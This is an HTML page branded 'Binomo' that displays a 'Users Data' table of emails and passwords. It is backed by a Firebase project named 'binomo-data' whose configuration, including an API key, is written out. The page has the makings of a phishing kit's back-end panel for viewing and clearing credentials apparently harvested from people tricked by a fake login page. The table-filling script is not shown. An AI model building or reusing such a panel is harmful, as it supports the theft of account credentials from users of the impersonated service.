<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"
    />
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="css/bootstrap.min.css" />
    <link rel="stylesheet" href="css/style.css" />
    <title>Binomo</title>
    <script src="https://www.gstatic.com/firebasejs/5.0.4/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/5.0.4/firebase-firestore.js"></script>
  </head>
  <body style="padding: 0">
    <div class="container">
      <div class="d-flex my-3 align-items-center justify-content-between">
        <h2>Users Data</h2>
        <button class="py-2 px-3" id="clearAll"><i class="fa fa-times"></i> CLEAR DATA</button>
      </div>
      <table id="table" class="table table-striped table-inverse table-responsive">
        <thead class="thead-inverse">
          <tr>
            <th>#</th>
            <th>Email</th>
            <th>Password</th>
          </tr>
        </thead>
        <tbody></tbody>
      </table>
    </div>

    <!-- Javascript -->
    <script src="js/bootstrap.bundle.min.js"></script>
    <script>
      const firebaseConfig = {
        apiKey: "AIzaSyCY3_E5c0Y8Ir8_0JXsAYGa3uI7V98hOSk",
        authDomain: "binomo-data.firebaseapp.com",
        projectId: "binomo-data",
        storageBucket: "binomo-data.appspot.com",
        messagingSenderId: "159157304926",
        appId: "1:159157304926:web:7e2583ec9b14412effbecf",
        measurementId: "G-4RDMHSEQYT",
      };
      firebase.initializeApp(firebaseConfig);
      const db = firebase.firestore();
      console.log(db);
      db.settings({ timestampsInSnapshots: true });

    </script>

    <script src="js/main.js"></script>
  </body>
</html>
